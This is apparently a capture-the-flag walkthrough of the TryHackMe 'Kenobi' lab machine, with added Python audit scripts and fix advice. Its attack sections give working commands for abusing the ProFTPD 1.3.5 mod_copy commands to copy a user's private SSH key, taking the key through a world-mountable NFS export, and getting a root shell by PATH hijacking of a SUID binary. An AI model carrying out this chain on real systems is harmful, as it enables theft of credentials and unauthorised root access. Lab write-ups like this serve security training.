TryHackMe – Kenobi

Room: https://tryhackme.com/room/kenobi

Enumeration

Port Scan (nmap)

nmap -sV -v 10.10.68.196

Running our nmap scan, we get 7 open ports back. Most notably an FTP server, SSH, a web server and Samba (SMB).

SMB Enumeration

nmap has scripts to enumerate SMB, so let’s run them:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.68.196

We get back three SMB shares: IPC$, anonymous and print$. Let’s investigate the anonymous one:

# log into the anonymous share; just press Enter for the password
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.68.196/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.

# we run ls and see a log.txt
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877112 blocks available

# log out
smb: \> exit

# and run smbget to grab that file
┌──(kali㉿kali)-[~/thm]
└─$ smbget -U anonymous smb://10.10.68.196/anonymous/log.txt
Password for [anonymous] connecting to //anonymous/10.10.68.196:
Using workgroup WORKGROUP, user anonymous
smb://10.10.68.196/anonymous/log.txt
Downloaded 11.95kB in 3 seconds

RPC Bind Enumeration

We know from our nmap scan that port 111 is running rpcbind; in our case it backs an NFS export, so we can use nmap scripts to enumerate that as well:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.68.196
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

So /var is exported over NFS, and the `*` means any host is allowed to mount it.
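To turn that showmount result into a repeatable check, here is an added Python example (my own code, not part of the room or this writeup) that parses nmap's nfs-showmount output, flags exports any host may mount, and reports whether a given file falls under an export reachable from a given client address. The second export and the client addresses are constructed for illustration.

```python
import ipaddress
import re
from pathlib import PurePosixPath

# Constructed sample: the nmap nfs-showmount lines from the scan above, plus one
# assumed extra export restricted to a subnet so both outcomes can be shown.
SHOWMOUNT_OUTPUT = """\
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|   /var *
|_  /srv/backup 10.10.0.0/16
"""

EXPORT_LINE = re.compile(r"^\|[_ ]\s+(\S+)\s+(.+)$")  # "|   /export client[,client]"


def parse_showmount(output):
    """Map each exported directory to the client entries nmap reported for it."""
    exports = {}
    for line in output.splitlines():
        m = EXPORT_LINE.match(line.rstrip())
        if m:
            exports[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
    return exports


def client_allows(client, host):
    """Does one client entry ('*', a CIDR, an address or a hostname) cover host?"""
    if client in ("*", "(everyone)"):
        return True
    try:
        return ipaddress.ip_address(host) in ipaddress.ip_network(client, strict=False)
    except ValueError:
        return client == host  # hostname entry: exact match only


def is_world_export(clients):
    """True for an export any host may mount, which is what the scan showed for /var."""
    return any(c in ("*", "(everyone)") for c in clients)


def exposing_export(exports, path, host):
    """Return the export through which `host` can reach `path`, or None if none applies."""
    target = PurePosixPath(path)
    for directory, clients in exports.items():
        d = PurePosixPath(directory)
        if (target == d or d in target.parents) and any(client_allows(c, host) for c in clients):
            return directory
    return None
```

The fix on the server side is to list only the hosts that need the export instead of `*`, and to export directories that do not double as a world-writable drop zone like /var/tmp.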

Gain Access

The server is running ProFTPD, and some versions are known to be vulnerable. We can connect with netcat to read the banner and see which version it is running:

┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]

And now use searchsploit to look for any exploits:

┌──(kali㉿kali)-[~/thm]
└─$ searchsploit proftpd 1.3.5
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)          | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                          | linux/remote/36742.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We have three exploits, all based on the mod_copy module, which implements the SITE CPFR (copy from) and SITE CPTO (copy to) commands. Earlier we downloaded the log file from the server; reading through it, we can see that the service runs as the kenobi user and that an SSH key was generated for that user. So let’s connect to the FTP service again and try to copy that SSH key into /var, the directory exported over NFS, which we can mount in order to grab the key for ourselves.

┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Great! Now exit the FTP session (Ctrl+C) and mount /var in order to grab the key:

┌──(kali㉿kali)-[~/thm]
└─$ sudo mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ sudo mount 10.10.68.196:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Mar 22 11:49 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Mar 22 11:48 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

We’re in! Now let’s grab the key from /var/tmp and use it to log in:

┌──(kali㉿kali)-[~/thm]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .

┌──(kali㉿kali)-[~/thm]
└─$ sudo chmod 600 id_rsa

┌──(kali㉿kali)-[~/thm]
└─$ ssh -i id_rsa kenobi@10.10.68.196

kenobi@kenobi:~$

And now we can cat user.txt for the flag!

PrivEsc

We have access as kenobi, but let’s gain root access. Let’s search for any executables running with a SUID set:

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null

One interesting binary is /usr/bin/menu, which, when executed, appears to be a custom menu interface for running a few fixed commands: checking the web interface, the kernel version or the IP address:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

By running strings /usr/bin/menu we can see which commands it runs, each called by bare name rather than by absolute path:

curl -I localhost
uname -r
ifconfig

Because the binary is SUID root and looks these commands up through PATH, we can prepend a directory of our own to PATH so that one of them resolves to a script that gives us a root shell. The room does this with curl, but I am going to use ifconfig, because it is invoked without any options.

# cd to the temp directory
kenobi@kenobi:~$ cd /tmp
# write a fake ifconfig script that just runs /bin/sh
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
# give it full permissions
kenobi@kenobi:/tmp$ chmod 777 ifconfig
# put /tmp, containing our fake ifconfig, at the front of our PATH
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
# rerun the menu and choose the ifconfig option
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3

# whoami
root

And we are root! Now let’s move into root’s home directory with cd /root and read the flag with cat root.txt!
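As an added defensive check (my own example, not the room’s or the writeup’s code), here is a small Python audit that does by script what we did by hand: it walks the filesystem for setuid files and flags any whose embedded strings invoke a command by bare name, which is what makes the PATH override work. The ELF-like byte blob is a constructed stand-in for /usr/bin/menu and the WATCHED set is an assumption.

```python
import os
import re
import stat

# Constructed stand-in for /usr/bin/menu: the strings the writeup recovered with
# strings(1), wrapped in binary filler so the extractor has something to skip.
FAKE_MENU = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
             + b"curl -I localhost\x00uname -r\x00ifconfig\x00"
             + b"/usr/bin/menu\x00** Enter your choice :\x00\x90\x90\xcc")

# Assumed list of commands a helper like menu is likely to shell out to.
WATCHED = {"curl", "uname", "ifconfig", "id", "cat", "sh", "bash"}


def extract_strings(data, min_len=4):
    """Minimal strings(1): runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def unqualified_commands(strings):
    """Strings whose first word is a watched command given by bare name."""
    # `ifconfig` rather than `/sbin/ifconfig` is resolved through the caller's
    # PATH, which is exactly what the menu trick above abuses.
    hits = []
    for s in strings:
        words = s.split()
        if words and words[0] in WATCHED:  # absolute paths never match
            hits.append(s)
    return hits


def audit_suid(root="/"):
    """Map each setuid regular file under root to the bare-name commands it embeds."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID):
                    continue
                with open(path, "rb") as f:
                    hits = unqualified_commands(extract_strings(f.read()))
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report
```

Running audit_suid('/usr/bin') on the target should report /usr/bin/menu with its three bare-name commands; the fix is for setuid programs to call commands by absolute path or set a fixed PATH before shelling out.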

Machine Compendium

{
	"MACHINE_IP": "10.10.68.196",
	"MACHINE_INFO" : {
		"os": "Ubuntu Linux",
		"host": "KENOBI"
	},
	"OPEN_PORTS": {
		"21": ["ftp", "ProFTPD 1.3.5"],
		"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.7"],
		"80": ["http", "Apache httpd 2.4.18"],
		"111": ["rpcbind", "2-4 (RPC #100000)"],
		"139": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
		"445": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
		"2049": ["nfs_acl", "2-3 (RPC #100227)"]
	},
	"SMB":{
		"paths": ["\\\\10.10.68.196\\IPC$","\\\\10.10.68.196\\anonymous","\\\\10.10.68.196\\print$"]
	},
	"CREDENTIALS":{

	},
	"OTHER_INFO": {
		"vulnerabilities": ["ProFTPD 1.3.5"]
	}
}
